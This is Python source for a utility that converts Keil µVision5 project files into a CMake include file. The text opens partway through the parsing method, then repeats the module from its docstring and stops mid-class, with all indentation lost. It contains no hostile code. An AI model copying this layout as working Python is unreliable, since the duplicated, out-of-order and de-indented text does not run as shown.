with open(project_file_path) as f:
# noinspection PyProtectedMember
xproj: etree._Element = etree.parse(f).getroot()
with open(project_options_path) as f:
# noinspection PyProtectedMember
xopt: etree._Element = etree.parse(f).getroot()
# region Project File
if xproj.tag != "Project":
raise ValueError("Invalid uVision Project File XML file")
# noinspection PyCallByClass,SpellCheckingInspection
targets = [
Target(
name=text(target, "TargetName"),
toolset=Target.Toolset(
number=strict_hex(target, "ToolsetNumber"),
name=text(target, "ToolsetName")
),
compiler=Target.Compiler(
cc=text(target, "pCCUsed", nullable=True),
ac6=strict_bool(target, "uAC6")
),
options=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
Target.Options(
common=next(
Target.Options.Common(
device=text(tco, "Device"),
vendor=text(tco, "Vendor"),
pack_id=text(tco, "PackID"),
pack_url=text(tco, "PackURL"),
cpu=text(tco, "Cpu"),
device_id=text(tco, "DeviceId"),
register_file=text(tco, "RegisterFile")
) for tco in to.xpath("TargetCommonOption")
),
properties=next(
Target.Options.Properties(
use_cpp_compiler=strict_bool(tcp, "UseCPPCompiler"),
) for tcp in to.xpath("CommonProperty")
)
) for to in target.xpath("TargetOption")
),
build=next(
Target.Build(
misc=Target.Build.Misc(
cpu_type=text(to_taa, "ArmAdsMisc/AdsCpuType"),
memories=[
Target.Build.Misc.Memory(
name=memory.tag,
type=Target.Build.Misc.Memory.Type(int(text(memory, "Type"))),
start=strict_hex(memory, "StartAddress"),
size=strict_hex(memory, "Size")
) for memory in to_taa.xpath("ArmAdsMisc/OnChipMemories/*")
]
),
c=next(
Target.Build.C(
optimization=int(text(to_taa_c, "Optim")),
strict=strict_bool(to_taa_c, "Strict"),
c99=strict_bool(to_taa_c, "uC99"),
gnu=strict_bool(to_taa_c, "uGnu"),
misc=[
mc.strip() for mc in text(to_taa_c, "VariousControls/MiscControls").split(",")
],
defines=[
mc.strip() for mc in text(to_taa_c, "VariousControls/Define").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_c, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in text(to_taa_c, "VariousControls/IncludePath").split(";")
]
) for to_taa_c in to_taa.xpath("Cads")
),
asm=next(
Target.Build.Asm(
misc=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/MiscControls") or "").split(",")
],
defines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Define") or "").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/IncludePath") or "").split(";")
]
) for to_taa_a in to_taa.xpath("Aads")
),
ld=next(
Target.Build.Linker(
text_address_range=strict_hex(to_taa_ld, "TextAddressRange"),
data_address_range=strict_hex(to_taa_ld, "DataAddressRange"),
misc=[
mc.strip() for mc in
text(to_taa_ld, "Misc").split(",") # TODO: Delimiter unknown
]
) for to_taa_ld in to_taa.xpath("LDads")
)
) for to_taa in target.xpath("TargetOption/TargetArmAds")
),
groups=[
Target.Group(
name=text(group, "GroupName"),
files=[
Target.File(
name=text(file, "FileName"),
type=FileType(int(text(file, "FileType"))),
path=text(file, "FilePath"),
include_in_build=strict_bool(file, "FileOption/CommonProperty/IncludeInBuild",
nullable=True),
always_build=strict_bool(file, "FileOption/CommonProperty/AlwaysBuild",
nullable=True, true_value="2")
) for file in group.xpath("Files/File")
]
) for group in target.xpath("Groups/Group")
]
) for target in xproj.xpath("Targets/Target")
]
# region RTE
# noinspection PyCallByClass,PyTypeChecker
rte = RTE(
packages=[
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# Using generator and list only for local variable
version_match_mode=next(RTE.TargetInfo.VersionMatchMode(vmm) if vmm else None
for vmm in [text(ti, "versionMatchMode", True, True)])
) for ti in package.xpath("targetInfos/targetInfo")
]
) for package in xproj.xpath("RTE/packages/package")
],
components=[
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
# This new instance of package will be replaced below with reference to an actual matching
# instance of the package from rte.packages.
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=None
) for package in component.xpath("package")
),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# TODO: Handle nullable
# RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True))
version_match_mode=None
) for ti in component.xpath("targetInfos/targetInfo")
]
) for component in xproj.xpath("RTE/components/component")
],
files=[
RTE.File(
attr=RTE.File.Attribute(text(file, "attr", True)),
category=RTE.File.Category(text(file, "category", True)),
condition=text(file, "condition", True, True),
name=text(file, "name", True),
version=text(file, "version", True),
instance=text(file, "instance"),
component=next(
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=None,
target_infos=None
) for component in file.xpath("component")
),
package=None, # TODO
target_infos=None, # TODO
) for file in xproj.xpath("RTE/files/file")
]
)
# TODO: Connect actual references of the rte.packages and rte.packages.target_infos
for component in rte.components:
cp = component.package
component.package = None
cp.target_infos = None
for package in rte.packages:
# Temporally remove target_infos to enable usage of equality operator.
pti = package.target_infos
package.target_infos = None
if cp == package:
component.package = package
package.target_infos = pti
break
package.target_infos = pti
# endregion RTE
# endregion Project File
# region Project Options
if xopt.tag != "ProjectOpt":
raise ValueError("Invalid uVision Project Options XML file")
groups: List[Group] = []
for group in xopt.xpath("Group"):
group_name = text(group, "GroupName")
# Find this group in the Project File
xproj_group = next(g for g in next(iter(targets)).groups if (g.name == group_name))
# Find all files in this group and also in the Project File
files: List[File] = []
for file in group.xpath("File"):
file_type = FileType(int(text(file, "FileType")))
file_name = text(file, "FilenameWithoutPath")
xproj_file = next(f for f in xproj_group.files if (f.type == file_type and f.name == file_name))
files.append(File(
group_number=int(text(file, "GroupNumber")),
number=int(text(file, "FileNumber")),
type=file_type,
expanded=strict_bool(file, "tvExp"),
include_in_build=xproj_file.include_in_build,
always_build=xproj_file.always_build,
tv_exp_opt_dlg=strict_bool(file, "tvExpOptDlg"),
dave2=strict_bool(file, "bDave2"),
path=text(file, "PathWithFileName"),
filename=file_name,
rte_flag=strict_bool(file, "RteFlg"),
shared=strict_bool(file, "bShared")
))
groups.append(Group(
name=group_name,
expanded=strict_bool(group, "tvExp"),
tv_exp_opt_dlg=strict_bool(group, "tvExpOptDlg"),
cb_sel=strict_bool(group, "cbSel"),
rte_flag=strict_bool(group, "RteFlg"),
files=files
))
# There is no more *currently relevant* data in the Project Options file.
# endregion Project Options
# Add RTE files to the file groups to actually match the Project Window file browser.
for file in rte.files:
# Find the group to which this file belongs to (there shall be one and only one).
group = None
group_number = 1
for group_number, group in enumerate(groups, 1):
if group.files and group.files[0].group_number != group_number:
warnings.warn(f"Inconsistent group number {group.files[0].group_number} for group {group.name}"
f" (expected to be {group_number})")
if group.rte_flag and group.name.strip(":") == file.component.class_:
break
filename = os.path.basename(file.instance)
# Detect file type (this information is not provided for RTE files)
if filename.endswith(".s"):
file_type = FileType.ASM_SOURCE
elif filename.endswith(".c"):
file_type = FileType.C_SOURCE
elif filename.endswith(".cpp"):
file_type = FileType.CPP_SOURCE
elif filename.endswith(".h"):
file_type = FileType.TEXT_DOCUMENT
else:
warnings.warn(f"Unknown RTE file type '{file.instance}': {file}")
continue
group.files.append(File(
group_number=group_number,
number=max(f.number for g in groups for f in g.files) + 1,
type=file_type,
expanded=False,
include_in_build=True, # TODO: This information is available for RTE files
always_build=None,
tv_exp_opt_dlg=False, # TODO
dave2=False, # TODO
path=file.instance,
filename=os.path.basename(file.instance),
rte_flag=True,
shared=False
))
return cls(
project_file_path=project_file_path,
project_options_path=project_options_path,
targets=targets,
groups=groups
)
def source_files(self) -> Iterator[Tuple[File, Optional[Language], Optional[str]]]:
"""
Get all files grouped by the file type with group names as a comments.
"""
# Add source files
for group in self.groups:
comment = group.name
if group.rte_flag:
# RTE groups start with double colon (::).
comment = "RTE" + comment
# Group files by type and add one comment for every file type as they are in the separate sections.
files: Dict[Union[Language, None], List[File]] = defaultdict(list)
for file in group.files:
if file.type == FileType.ASM_SOURCE:
lang = Language.ASM
elif file.type == FileType.C_SOURCE:
lang = Language.C
elif file.type == FileType.TEXT_DOCUMENT:
lang = None
else:
warnings.warn(f"Unsupported file type: {file.type} for {file}")
continue
files[lang].append(file)
for lang, files in files.items():
comment_per_type = comment
for file in files:
yield file, lang, comment_per_type
comment_per_type = None
class CMake:
@dataclass
class String:
value: str
"""The actual string value."""
languages: Set[Language]
"""Set of all build configs in which this value is present."""
common: bool = False
comment: Optional[str] = None
"""Comment which will be added to the line before"""
def __eq__(self, o: 'CMake.String') -> bool:
if isinstance(o, type(self)):
return self.value == o.value
elif isinstance(o, str):
return self.value == o
return NotImplemented
def __init__(self) -> None:
self.include_paths: List[CMake.String] = []
self.defines: List[CMake.String] = []
self.undefines: List[CMake.String] = []
self.source_file_paths: List[CMake.String] = []
self.other_file_paths: List[CMake.String] = []
@classmethod
def _get(cls, lst: List[String], obj: str) -> String:
"""Get existing object from the list or append a new one to the end."""
try:
# noinspection PyTypeChecker
itm = lst[lst.index(obj)]
except ValueError:
# noinspection PyCallByClass
itm = cls.String(obj, set())
lst.append(itm)
return itm
@classmethod
def _add_values(cls, where: List[String], values: Union[str, Iterable[str]],
languages: Union[Language, Collection[Language], None], comment: Optional[str] = None) -> None:
if isinstance(languages, Language):
languages = [languages]
for val in values:
obj = cls._get(where, val)
if comment is not None:
# Add comment to the first value only
obj.comment = comment
comment = None
if languages:
obj.languages.update(languages)
@staticmethod
def _clean_paths(paths: Union[str, Iterable[str]]) -> List[str]:
if isinstance(paths, (str, Path)):
paths = [paths]
return [Path(p).as_posix() for p in map(os.path.normpath, paths)]
def add_include_paths(self, paths: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.include_paths, self._clean_paths(paths), languages, comment)
def add_defines(self, defines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.defines, defines, languages, comment)
def add_undefines(self, undefines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.undefines, undefines, languages, comment)
def add_source_files(self, paths: Union[None, str, Iterable[str]],
languages: Union[Language, Collection[Language], None],
comment: str = None, include_in_build: bool = True) -> None:
paths = self._clean_paths(paths)
# If file is not included in the build, comment it
if include_in_build is False:
paths = ["# " + path for path in paths]
self._add_values(self.source_file_paths if languages else self.other_file_paths, paths, languages, comment)
def add_other_files(self, paths: Union[str, Iterable[str]], comment: str = None) -> None:
self.add_source_files(paths, None, comment)
def check_common(self) -> Set[Language]:
"""
Check which properties are common to all language configurations.
:return: Set of all used languages (languages with at least one property)
"""
all_props = (self.include_paths, self.defines, self.undefines, self.source_file_paths)
# Get all of the defined languages used
languages = {lang
for props in all_props
for prop in props
for lang in prop.languages}
for props in all_props:
for prop in props:
prop.common = (prop.languages == languages)
return languages
def __str__(self) -> str:
languages = sorted(self.check_common(), key=operator.attrgetter('value'))
ret_str = [
"# Made with CMake <> uVision project file synchronizer"
"# https://github.com/bojanpotocnik/cmake-uvision-syncer"
]
# Set of the build properties
prop_sets: List[Tuple[str, str, List[CMake.String], str]] = [
("definitions", "DEFINES", self.defines, "-D"),
("un-defines", "UNDEFINES", self.undefines, ""),
("include directories", "INCLUDE_DIRS", self.include_paths, ""),
("source files", "SOURCES", self.source_file_paths, ""),
]
# Set of the language configs per build property
sub_prop_sets: List[Tuple[str, str, Callable[[CMake.String], bool]]] = [
("Common", "COMMON", lambda prop: prop.common),
*((lang.value + " specific", lang.name,
lambda prop, lang_=lang: (not prop.common) and (lang_ in prop.languages))
for lang in languages)
]
def _add_section_files(comment: str, var_name: str, value_iterator: Iterable[CMake.String],
value_prefix: str = "") -> str:
s = (f"# {comment}\n"
f"set({var_name}")
value_str = ''
for value in value_iterator:
if value.comment is not None:
value_str += f"\n\t# {value.comment}"
value_str += f"\n\t{value_prefix}{value.value}"
if len(value_str) is not 0:
return s + value_str + "\n)"
else:
return None
for section_comment, section_var_prefix, section_props, val_prefix in prop_sets:
ss_str = []
for prop_set_comment, var_suffix, filter_fun in sub_prop_sets:
section_files = _add_section_files(
comment=f"{prop_set_comment} {section_comment}",
var_name=f"{section_var_prefix}_{var_suffix}",
value_iterator=filter(filter_fun, section_props),
value_prefix=val_prefix
)
if section_files is not None:
ss_str.append(section_files)
ret_str.append("\n\n".join(ss_str))
other_files = _add_section_files(
comment="Other files",
var_name="OTHER_FILES",
value_iterator=self.other_file_paths
)
if other_files is not None:
ret_str.append(other_files)
return "\n\n\n".join(ret_str)
def main() -> None:
# region Parse arguments
arguments = docopt(__doc__)
project_path: str = arguments["<project>"] or "."
if not os.path.isfile(project_path):
with os.scandir(project_path) as dirs: # type: Iterator[DirEntry]
projects = [de.path for de in dirs if (de.is_file() and (os.path.splitext(de.name)[1] == ".uvprojx"))]
if not projects:
raise FileNotFoundError(f"Could not find any .uvprojx file in '{project_path}'")
elif len(projects) > 1:
# Choose the latest file by modification time.
project_path = max(projects, key=os.path.getmtime)
else:
project_path = projects[0]
project_path = os.path.realpath(project_path)
# endregion Parse arguments
print(f"Using µVision5 Project File '{project_path}'")
# Parse uVision project XML files
uvp = UVisionProject.new(project_path)
# Generate CMake file and populate it with information from uVision project
cmake = CMake()
# Add Assembler properties
cmake.add_include_paths(uvp.targets[0].build.asm.include_paths, Language.ASM)
cmake.add_defines(uvp.targets[0].build.asm.defines, Language.ASM)
cmake.add_undefines(uvp.targets[0].build.asm.undefines, Language.ASM)
# Add C properties
cmake.add_include_paths(uvp.targets[0].build.c.include_paths, Language.C)
cmake.add_defines(uvp.targets[0].build.c.defines, Language.C)
cmake.add_undefines(uvp.targets[0].build.c.undefines, Language.C)
# Add source and other files
for file, lang, comment in uvp.source_files():
cmake.add_source_files(file.path, lang, comment, file.include_in_build)
fp_proj_cmake = os.path.join(os.path.dirname(uvp.project_file_path),
os.path.splitext(os.path.basename(uvp.project_file_path))[0] + ".cmake")
with open(fp_proj_cmake, 'w') as f:
print(cmake, file=f)
print(f"Generated CMake file '{fp_proj_cmake}'")
if __name__ == "__main__":
main()
| """
Usage:
main.py [<project>]
Options:
<project> Path to the .uvprojx file (Keil® µVision5 Project File).
The .uvoptx file (Keil® µVision5 Project Options file) will
be located automatically as it shall be adjacent to the
.uvprojx file, having the same filename.
If this is a directory, .uvprojx is found automatically (if
multiple found then the latest changed is chosen).
If not provided then the current working directory is chosen
as a project directory.
"""
import enum
import operator
import os
import warnings
from collections import defaultdict
from dataclasses import dataclass
from os import DirEntry
from pathlib import Path
from typing import List, Optional, Union, Iterable, Collection, Set, Tuple, Callable, Dict, Iterator
from docopt import docopt
from lxml import etree
__author__ = "<NAME>"
UnknownInt = int
UnknownBool = bool
@enum.unique
class Language(enum.Enum):
ASM = "Assembler"
C = "C"
CPP = "C++"
@enum.unique
class FileType(enum.Enum):
C_SOURCE = 1
"""C Source file"""
ASM_SOURCE = 2
"""Assembly language file"""
OBJECT = 3
"""Object file"""
LIBRARY = 4
"""Library file"""
TEXT_DOCUMENT = 5
"""Text Document file"""
CUSTOM = 7
"""Custom file"""
CPP_SOURCE = 8
"""C++ Source file"""
IMAGE = 9
"""Image file"""
# region XML data structures for Project File
@dataclass
class Target:
@dataclass
class Toolset:
number: int
name: str
@dataclass
class Compiler:
cc: str
ac6: bool
@dataclass
class Options:
@dataclass
class Common:
device: str
vendor: str
pack_id: str
pack_url: str
cpu: str
device_id: int
register_file: str
@dataclass
class Properties:
use_cpp_compiler: bool
common: Common
properties: Properties
@dataclass
class Build:
@dataclass
class Misc:
@dataclass
class Memory:
@enum.unique
class Type(enum.Enum):
"""TODO: Real meaning unknown."""
TYPE0 = 0
TYPE1 = 1
name: str
type: Type
start: int
size: int
cpu_type: str
memories: List[Memory]
@dataclass
class C:
optimization: int
strict: bool
c99: bool
gnu: bool
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Asm:
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Linker:
text_address_range: int
data_address_range: int
misc: List[str]
misc: Misc
c: C
asm: Asm
ld: Linker
@dataclass
class File:
name: str
type: FileType
path: str
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
@dataclass
class Group:
name: str
files: List['Target.File']
name: str
toolset: Toolset
compiler: Compiler
options: Options
build: Build
groups: List[Group]
@dataclass
class RTE:
@dataclass
class TargetInfo:
@enum.unique
class VersionMatchMode(enum.Enum):
FIXED = "fixed"
name: str
version_match_mode: Optional[VersionMatchMode]
@dataclass
class Package:
name: str
url: str
vendor: str
version: str
target_infos: List['RTE.TargetInfo']
@dataclass
class Component:
class_: str
group: str
vendor: str
version: str
condition: str
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
@dataclass
class File:
@enum.unique
class Attribute(enum.Enum):
CONFIG = "config"
@enum.unique
class Category(enum.Enum):
SOURCE = "source"
attr: Attribute
category: Category
condition: Optional[str]
name: str
version: str
instance: str
component: 'RTE.Component'
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
packages: List[Package]
components: List[Component]
files: List[File]
# endregion XML data structures for Project File
# region XML data structures for Project Options file
@dataclass
class File:
group_number: int
"""Number of the :cls:`Group` this file belongs to."""
number: int
"""Number of the file (global across all groups)."""
type: FileType
"""File type as selected in the Options for File ... -> Properties dialog"""
expanded: bool
"""Whether the file is expanded (include file dependencies shown) in the Project Window file browser."""
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
tv_exp_opt_dlg: UnknownBool
dave2: UnknownBool
path: str
filename: str
rte_flag: bool
"""Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
shared: UnknownBool
_project_file: Target.File = None
"""Reference to the instance of this file from the Project File."""
@dataclass
class Group:
name: str
"""Group name as shown in the Project Window file browser."""
expanded: bool
"""Whether the group is expanded (files shown) in the Project Window file browser."""
tv_exp_opt_dlg: UnknownBool
cb_sel: UnknownBool
rte_flag: bool
"""Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
files: List[File]
"""List of files in this group."""
_project_group: Target.Group = None
"""Reference to the instance of this group from the Project File."""
# endregion XML data structures for Project Options file
# region XML parsing helper functions
def text(element: etree.ElementBase, name: str, is_attribute: bool = False, nullable: bool = False) -> Optional[str]:
if is_attribute:
if nullable:
return element.attrib.get(name)
else:
return element.attrib[name]
value = element.xpath(name)
if (not value) and nullable:
return None
if len(value) != 1:
raise ValueError(f"Only one '{name}' tag per tree is supported, {len(value)} found")
return value[0].text
def strict_bool(element: etree.ElementBase, name: str, nullable: bool = False, *,
false_value: str = "0", true_value: str = "1") -> Optional[bool]:
value = text(element, name, nullable=nullable)
if value == false_value:
return False
if value == true_value:
return True
if (value is None) and nullable:
return None
raise ValueError(f"'{value}' (of {name}) is not valid boolean value")
def strict_hex(element: etree.ElementBase, name: str) -> int:
value = text(element, name)
if not value.startswith("0x"):
raise ValueError(f"'{value}' (of {name}) is not valid hexadecimal value")
return int(value, 16)
# endregion XML parsing helper functions
@dataclass
class UVisionProject:
project_file_path: str
project_options_path: str
# region Project File
targets: List[Target]
# endregion Project File
# region Project Options
groups: List[Group]
"""Groups of files, as shown in the Project Window file browser."""
# endregion Project Options
@classmethod
def new(cls, project_file_path: str) -> 'UVisionProject':
fp_base = os.path.splitext(project_file_path)[0]
project_file_path = fp_base + ".uvprojx"
project_options_path = fp_base + ".uvoptx"
with open(project_file_path) as f:
# noinspection PyProtectedMember
xproj: etree._Element = etree.parse(f).getroot()
with open(project_options_path) as f:
# noinspection PyProtectedMember
xopt: etree._Element = etree.parse(f).getroot()
# region Project File
if xproj.tag != "Project":
raise ValueError("Invalid uVision Project File XML file")
# noinspection PyCallByClass,SpellCheckingInspection
targets = [
Target(
name=text(target, "TargetName"),
toolset=Target.Toolset(
number=strict_hex(target, "ToolsetNumber"),
name=text(target, "ToolsetName")
),
compiler=Target.Compiler(
cc=text(target, "pCCUsed", nullable=True),
ac6=strict_bool(target, "uAC6")
),
options=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
Target.Options(
common=next(
Target.Options.Common(
device=text(tco, "Device"),
vendor=text(tco, "Vendor"),
pack_id=text(tco, "PackID"),
pack_url=text(tco, "PackURL"),
cpu=text(tco, "Cpu"),
device_id=text(tco, "DeviceId"),
register_file=text(tco, "RegisterFile")
) for tco in to.xpath("TargetCommonOption")
),
properties=next(
Target.Options.Properties(
use_cpp_compiler=strict_bool(tcp, "UseCPPCompiler"),
) for tcp in to.xpath("CommonProperty")
)
) for to in target.xpath("TargetOption")
),
build=next(
Target.Build(
misc=Target.Build.Misc(
cpu_type=text(to_taa, "ArmAdsMisc/AdsCpuType"),
memories=[
Target.Build.Misc.Memory(
name=memory.tag,
type=Target.Build.Misc.Memory.Type(int(text(memory, "Type"))),
start=strict_hex(memory, "StartAddress"),
size=strict_hex(memory, "Size")
) for memory in to_taa.xpath("ArmAdsMisc/OnChipMemories/*")
]
),
c=next(
Target.Build.C(
optimization=int(text(to_taa_c, "Optim")),
strict=strict_bool(to_taa_c, "Strict"),
c99=strict_bool(to_taa_c, "uC99"),
gnu=strict_bool(to_taa_c, "uGnu"),
misc=[
mc.strip() for mc in text(to_taa_c, "VariousControls/MiscControls").split(",")
],
defines=[
mc.strip() for mc in text(to_taa_c, "VariousControls/Define").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_c, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in text(to_taa_c, "VariousControls/IncludePath").split(";")
]
) for to_taa_c in to_taa.xpath("Cads")
),
asm=next(
Target.Build.Asm(
misc=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/MiscControls") or "").split(",")
],
defines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Define") or "").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/IncludePath") or "").split(";")
]
) for to_taa_a in to_taa.xpath("Aads")
),
ld=next(
Target.Build.Linker(
text_address_range=strict_hex(to_taa_ld, "TextAddressRange"),
data_address_range=strict_hex(to_taa_ld, "DataAddressRange"),
misc=[
mc.strip() for mc in
text(to_taa_ld, "Misc").split(",") # TODO: Delimiter unknown
]
) for to_taa_ld in to_taa.xpath("LDads")
)
) for to_taa in target.xpath("TargetOption/TargetArmAds")
),
groups=[
Target.Group(
name=text(group, "GroupName"),
files=[
Target.File(
name=text(file, "FileName"),
type=FileType(int(text(file, "FileType"))),
path=text(file, "FilePath"),
include_in_build=strict_bool(file, "FileOption/CommonProperty/IncludeInBuild",
nullable=True),
always_build=strict_bool(file, "FileOption/CommonProperty/AlwaysBuild",
nullable=True, true_value="2")
) for file in group.xpath("Files/File")
]
) for group in target.xpath("Groups/Group")
]
) for target in xproj.xpath("Targets/Target")
]
# region RTE
# noinspection PyCallByClass,PyTypeChecker
rte = RTE(
packages=[
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# Using generator and list only for local variable
version_match_mode=next(RTE.TargetInfo.VersionMatchMode(vmm) if vmm else None
for vmm in [text(ti, "versionMatchMode", True, True)])
) for ti in package.xpath("targetInfos/targetInfo")
]
) for package in xproj.xpath("RTE/packages/package")
],
components=[
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
# This new instance of package will be replaced below with reference to an actual matching
# instance of the package from rte.packages.
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=None
) for package in component.xpath("package")
),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# TODO: Handle nullable
# RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True))
version_match_mode=None
) for ti in component.xpath("targetInfos/targetInfo")
]
) for component in xproj.xpath("RTE/components/component")
],
files=[
RTE.File(
attr=RTE.File.Attribute(text(file, "attr", True)),
category=RTE.File.Category(text(file, "category", True)),
condition=text(file, "condition", True, True),
name=text(file, "name", True),
version=text(file, "version", True),
instance=text(file, "instance"),
component=next(
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=None,
target_infos=None
) for component in file.xpath("component")
),
package=None, # TODO
target_infos=None, # TODO
) for file in xproj.xpath("RTE/files/file")
]
)
# TODO: Connect actual references of the rte.packages and rte.packages.target_infos
for component in rte.components:
cp = component.package
component.package = None
cp.target_infos = None
for package in rte.packages:
# Temporally remove target_infos to enable usage of equality operator.
pti = package.target_infos
package.target_infos = None
if cp == package:
component.package = package
package.target_infos = pti
break
package.target_infos = pti
# endregion RTE
# endregion Project File
# region Project Options
if xopt.tag != "ProjectOpt":
raise ValueError("Invalid uVision Project Options XML file")
groups: List[Group] = []
for group in xopt.xpath("Group"):
group_name = text(group, "GroupName")
# Find this group in the Project File
xproj_group = next(g for g in next(iter(targets)).groups if (g.name == group_name))
# Find all files in this group and also in the Project File
files: List[File] = []
for file in group.xpath("File"):
file_type = FileType(int(text(file, "FileType")))
file_name = text(file, "FilenameWithoutPath")
xproj_file = next(f for f in xproj_group.files if (f.type == file_type and f.name == file_name))
files.append(File(
group_number=int(text(file, "GroupNumber")),
number=int(text(file, "FileNumber")),
type=file_type,
expanded=strict_bool(file, "tvExp"),
include_in_build=xproj_file.include_in_build,
always_build=xproj_file.always_build,
tv_exp_opt_dlg=strict_bool(file, "tvExpOptDlg"),
dave2=strict_bool(file, "bDave2"),
path=text(file, "PathWithFileName"),
filename=file_name,
rte_flag=strict_bool(file, "RteFlg"),
shared=strict_bool(file, "bShared")
))
groups.append(Group(
name=group_name,
expanded=strict_bool(group, "tvExp"),
tv_exp_opt_dlg=strict_bool(group, "tvExpOptDlg"),
cb_sel=strict_bool(group, "cbSel"),
rte_flag=strict_bool(group, "RteFlg"),
files=files
))
# There is no more *currently relevant* data in the Project Options file.
# endregion Project Options
# Add RTE files to the file groups to actually match the Project Window file browser.
for file in rte.files:
# Find the group to which this file belongs to (there shall be one and only one).
group = None
group_number = 1
for group_number, group in enumerate(groups, 1):
if group.files and group.files[0].group_number != group_number:
warnings.warn(f"Inconsistent group number {group.files[0].group_number} for group {group.name}"
f" (expected to be {group_number})")
if group.rte_flag and group.name.strip(":") == file.component.class_:
break
filename = os.path.basename(file.instance)
# Detect file type (this information is not provided for RTE files)
if filename.endswith(".s"):
file_type = FileType.ASM_SOURCE
elif filename.endswith(".c"):
file_type = FileType.C_SOURCE
elif filename.endswith(".cpp"):
file_type = FileType.CPP_SOURCE
elif filename.endswith(".h"):
file_type = FileType.TEXT_DOCUMENT
else:
warnings.warn(f"Unknown RTE file type '{file.instance}': {file}")
continue
group.files.append(File(
group_number=group_number,
number=max(f.number for g in groups for f in g.files) + 1,
type=file_type,
expanded=False,
include_in_build=True, # TODO: This information is available for RTE files
always_build=None,
tv_exp_opt_dlg=False, # TODO
dave2=False, # TODO
path=file.instance,
filename=os.path.basename(file.instance),
rte_flag=True,
shared=False
))
return cls(
project_file_path=project_file_path,
project_options_path=project_options_path,
targets=targets,
groups=groups
)
def source_files(self) -> Iterator[Tuple[File, Optional[Language], Optional[str]]]:
"""
Get all files grouped by the file type with group names as a comments.
"""
# Add source files
for group in self.groups:
comment = group.name
if group.rte_flag:
# RTE groups start with double colon (::).
comment = "RTE" + comment
# Group files by type and add one comment for every file type as they are in the separate sections.
files: Dict[Union[Language, None], List[File]] = defaultdict(list)
for file in group.files:
if file.type == FileType.ASM_SOURCE:
lang = Language.ASM
elif file.type == FileType.C_SOURCE:
lang = Language.C
elif file.type == FileType.TEXT_DOCUMENT:
lang = None
else:
warnings.warn(f"Unsupported file type: {file.type} for {file}")
continue
files[lang].append(file)
for lang, files in files.items():
comment_per_type = comment
for file in files:
yield file, lang, comment_per_type
comment_per_type = None
class CMake:
@dataclass
class String:
value: str
"""The actual string value."""
languages: Set[Language]
"""Set of all build configs in which this value is present."""
common: bool = False
comment: Optional[str] = None
"""Comment which will be added to the line before"""
def __eq__(self, o: 'CMake.String') -> bool:
if isinstance(o, type(self)):
return self.value == o.value
elif isinstance(o, str):
return self.value == o
return NotImplemented
def __init__(self) -> None:
self.include_paths: List[CMake.String] = []
self.defines: List[CMake.String] = []
self.undefines: List[CMake.String] = []
self.source_file_paths: List[CMake.String] = []
self.other_file_paths: List[CMake.String] = []
@classmethod
def _get(cls, lst: List[String], obj: str) -> String:
"""Get existing object from the list or append a new one to the end."""
try:
# noinspection PyTypeChecker
itm = lst[lst.index(obj)]
except ValueError:
# noinspection PyCallByClass
itm = cls.String(obj, set())
lst.append(itm)
return itm
@classmethod
def _add_values(cls, where: List[String], values: Union[str, Iterable[str]],
languages: Union[Language, Collection[Language], None], comment: Optional[str] = None) -> None:
